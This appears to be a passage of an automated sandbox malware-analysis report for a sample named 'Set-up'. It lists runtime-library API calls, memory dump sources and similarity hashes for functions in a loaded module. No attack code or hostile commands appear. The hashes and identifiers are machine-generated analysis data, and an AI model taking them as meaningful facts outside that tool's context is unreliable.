                                                                                              • ___lc_collate_cp_func.MSVCR100 ref: 6BC3AC38
                                                                                              • memcpy.MSVCR100(?,?,?), ref: 6BC3AC5F
                                                                                              • __crtLCMapStringA.MSVCR100 ref: 6BC3AC82
                                                                                              • __crtLCMapStringA.MSVCR100 ref: 6BC3ACA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: String__crt$___lc_collate_cp_func___lc_handle_funcmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 940776641-0
                                                                                              • Opcode ID: b1d35411f88b5a96ef55bcdd9ec6eda5678fbb014108f874b62a640219fa5d50
                                                                                              • Instruction ID: 9bc9a7de38dfb8e842b709c4607b939cfbaecec7efe5106f80a109eddf359209
                                                                                              • Opcode Fuzzy Hash: b1d35411f88b5a96ef55bcdd9ec6eda5678fbb014108f874b62a640219fa5d50
                                                                                              • Instruction Fuzzy Hash: 48217C72915219AFCF11CF95DD85D8E3BB5FB89360F184024F958A7260E236DA60CBA0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC28167
                                                                                                • Part of subcall function 6BC1E1BD: __EH_prolog3.LIBCMT ref: 6BC1E1C4
                                                                                                • Part of subcall function 6BC1E1BD: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(?,00000004,6BC1D999,?,00000014,6BC1D4BE,0000000A), ref: 6BC1E1F1
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC281A4
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC281AB
                                                                                              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC281CF
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 6BC28289
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?snextc@?$basic_streambuf@_?sputc@?$basic_streambuf@_H_prolog3H_prolog3_catchV12@
                                                                                              • String ID:
                                                                                              • API String ID: 4023532899-0
                                                                                              • Opcode ID: e510fb0144d764cf58ce535035205e24683403e8a864a935b4896add333c152a
                                                                                              • Instruction ID: 435aae3fd6b4e9b5a31209d968bd37c182e1872bcf2c678c83e17416ea77abbc
                                                                                              • Opcode Fuzzy Hash: e510fb0144d764cf58ce535035205e24683403e8a864a935b4896add333c152a
                                                                                              • Instruction Fuzzy Hash: 1921D170D58684DFDB11CFA9C450FADBBF0BF95318F64818AD045A7291EB788B40DBA1
                                                                                              APIs
                                                                                              • _malloc_crt.MSVCR100(0000000C,00000001,00000001,?,00000000,?,6BC3AA3B,?,00000001,00000001,00000000,00000000,?,6BC2249E,00000000,?), ref: 6BC3A90A
                                                                                              • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 6BC3A932
                                                                                              • _free_locale.MSVCR100 ref: 6BC3A94B
                                                                                              • free.MSVCR100 ref: 6BC3A952
                                                                                              • free.MSVCR100 ref: 6BC3A960
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: free$CompareExchangeInterlocked_free_locale_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 1641075975-0
                                                                                              • Opcode ID: 9f12f661c87bdf90a49550fb3ba5ecb501abc5d527b883d4b76a171998c38768
                                                                                              • Instruction ID: 8119c8867761dbd470cf172342a7e96cf8792e9340abf5353922ca787a82c0ad
                                                                                              • Opcode Fuzzy Hash: 9f12f661c87bdf90a49550fb3ba5ecb501abc5d527b883d4b76a171998c38768
                                                                                              • Instruction Fuzzy Hash: 8A11E436A06731EBCF14CF5AD485C4E3BB5EBC97607614058F525AB200E738DB10C7A0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2DF44
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,0000000C), ref: 6BC2DF69
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?in_avail@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JXZ.MSVCP100(00000001,?,0000000C), ref: 6BC2DF8A
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,0000000C), ref: 6BC2DFD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?in_avail@?$basic_streambuf@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_H_prolog3H_prolog3_catchIpfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 723763902-0
                                                                                              • Opcode ID: 084f0c4bd3db85e92616c12d8a0d5a4f2f0940561d54321241018d8c11f5353f
                                                                                              • Instruction ID: 86082cb77ce03d735c5095ae9325d794ba50f4dc992e94c8454af86fd4b5e84a
                                                                                              • Opcode Fuzzy Hash: 084f0c4bd3db85e92616c12d8a0d5a4f2f0940561d54321241018d8c11f5353f
                                                                                              • Instruction Fuzzy Hash: 6521D270A64706CFCB10CFA4C8919AEB7B2FFA4314B10856DE555D7360E7789B41CB89
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: CompareString___lc_collate_cp_func___lc_handle_func__crt_errnomemcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3865160394-0
                                                                                              • Opcode ID: 0c1ce6671e0a44c9e9103a7377bf7bd3f78b371c9e112c3194543d2e5e9a42c5
                                                                                              • Instruction ID: 6587c58f3a8ba26f5d95d0f021c2b1830a56750ce96745052bae92bc3e857a5f
                                                                                              • Opcode Fuzzy Hash: 0c1ce6671e0a44c9e9103a7377bf7bd3f78b371c9e112c3194543d2e5e9a42c5
                                                                                              • Instruction Fuzzy Hash: E011C132614124AFCF204F5DDC45E9E7BB9FBC5768B014110F9249B110E639EA208BA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23DE2
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000008), ref: 6BC23DF5
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000008), ref: 6BC23E00
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000008), ref: 6BC23E17
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000008), ref: 6BC23E25
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??2@U?$char_traits@_W@std@@@std@@$?getloc@?$basic_streambuf@_H_prolog3IncrefInit@?$basic_streambuf@_MtxinitMutexMutex::_Vlocale@2@std::_std::locale::facet::_
                                                                                              • String ID:
                                                                                              • API String ID: 2834010639-0
                                                                                              • Opcode ID: 4d4b03c30ddabc66be254904c6c62be27531cde525907de444f8702ae77a80a3
                                                                                              • Instruction ID: b8622b3809dd645d515b1052ac2ded4d113bd16346543da6913030c6a6eff127
                                                                                              • Opcode Fuzzy Hash: 4d4b03c30ddabc66be254904c6c62be27531cde525907de444f8702ae77a80a3
                                                                                              • Instruction Fuzzy Hash: 7E210B74611A06DFC764CF2CC680A1AB7F1BF8D704B104559D586CBB50EB34FA51CB90
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC240DE
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000008), ref: 6BC240F1
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000008), ref: 6BC240FC
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000008), ref: 6BC24113
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000008), ref: 6BC24121
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Similarity
                                                                                              • API ID: ??2@U?$char_traits@_W@std@@@std@@$?getloc@?$basic_streambuf@_H_prolog3IncrefInit@?$basic_streambuf@_MtxinitMutexMutex::_Vlocale@2@std::_std::locale::facet::_
                                                                                              • String ID:
                                                                                              • API String ID: 2834010639-0
                                                                                              • Opcode ID: e8e2f18b973a6e2e43cc2d10319a410954cfb352a6a9df051568c015811cb723
                                                                                              • Instruction ID: cc16f0e95ca0fe228544981f989d9585df5ca8a008eb350646f35e81406fae68
                                                                                              • Opcode Fuzzy Hash: e8e2f18b973a6e2e43cc2d10319a410954cfb352a6a9df051568c015811cb723
                                                                                              • Instruction Fuzzy Hash: A321F974621A02CFC754CF2CC581A1AB7F1BF8D304B104559D58ACBB50EB34FA11CB90
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D89E
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2D8C9
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000018), ref: 6BC2D8EE
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2D967
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2F153
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2F17E
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000018), ref: 6BC2F1A3
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2F21C
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23A7E
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000008), ref: 6BC23A91
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000008), ref: 6BC23A9C
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(00000000,00000008), ref: 6BC23AB3
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000008), ref: 6BC23AC1
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C04A
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000018), ref: 6BC2C075
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000018), ref: 6BC2C097
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000018), ref: 6BC2C108
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                              • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25A7F
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000014,00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC25A96
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC25ABF
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(00000000,00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC25ADA
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC3CA9C,?,?,00000000,00000000,00000014,6BC3ED82,?,0000000C,6BC3962C,?,?,?,?,?), ref: 6BC25AF2
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2599A
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000014,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?), ref: 6BC259B1
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?), ref: 6BC259DA
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?), ref: 6BC259F5
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004), ref: 6BC25A0D
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25D44
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000014,00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?), ref: 6BC25D5B
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?), ref: 6BC25D84
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(00000000,00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?), ref: 6BC25D9F
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?), ref: 6BC25DB7
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1CAE9
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000020,00000028,6BC1E494,?,?,00000000,00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?), ref: 6BC1CB00
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,?,?,00000004), ref: 6BC1CB2B
                                                                                              • ctype.LIBCPMT(00000000,?,?,00000004), ref: 6BC1CB44
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,?,00000004), ref: 6BC1CB5C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3ctype
                                                                                              • String ID:
                                                                                              • API String ID: 66114158-0
                                                                                              • Opcode ID: 344ceba2c7fa1b0e3ee0a6888df7703576a2bded916e493c33529eac494f6893
                                                                                              • Instruction ID: 5200206ec5ab7d3f391d78befc145fa0e9c2ee8b3c5161326bc1ee5b5ac856ef
                                                                                              • Opcode Fuzzy Hash: 344ceba2c7fa1b0e3ee0a6888df7703576a2bded916e493c33529eac494f6893
                                                                                              • Instruction Fuzzy Hash: BE1161719293249BEB14CFA8C48679E7BB0AF15B15F008169F811BF281E7BC9B80DB50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BFBC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000010,00000028,6BC39B30,?,?,00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?), ref: 6BC1BFD3
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,?,?,00000004), ref: 6BC1BFFE
                                                                                              • _Getcvt.MSVCP100(?,?,?,?,00000004), ref: 6BC1C014
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,?,00000004), ref: 6BC1C032
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@GetcvtH_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 69075322-0
                                                                                              • Opcode ID: 04ccafd44b93fe700a1abbc23affb56ec8d401e2e1bc5a692889ee5b9194b531
                                                                                              • Instruction ID: 8579e0c30266fbe8df85640165ef9aaafdea15d952d237e18532bf164c92b231
                                                                                              • Opcode Fuzzy Hash: 04ccafd44b93fe700a1abbc23affb56ec8d401e2e1bc5a692889ee5b9194b531
                                                                                              • Instruction Fuzzy Hash: 7A118E359263159FEB14CFA8C58579E77B0BF11725F0085ACE865AF280E7B89B40DF80
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BD91
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000010,00000028,6BC3A3B1,?,?,00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC1BDA8
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,?,?,00000004), ref: 6BC1BDD3
                                                                                              • _Getcvt.MSVCP100(?,?,?,?,00000004), ref: 6BC1BDE9
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,?,00000004), ref: 6BC1BE07
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@GetcvtH_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 69075322-0
                                                                                              • Opcode ID: eca854e1b7ac591ca230827fbd81402d8ccaaef4ac607115fc411cefce1d3078
                                                                                              • Instruction ID: b636e6488bb5d7e96baef1262f7f8e98cd135a4414c7fcf91b3f4323453e9e3f
                                                                                              • Opcode Fuzzy Hash: eca854e1b7ac591ca230827fbd81402d8ccaaef4ac607115fc411cefce1d3078
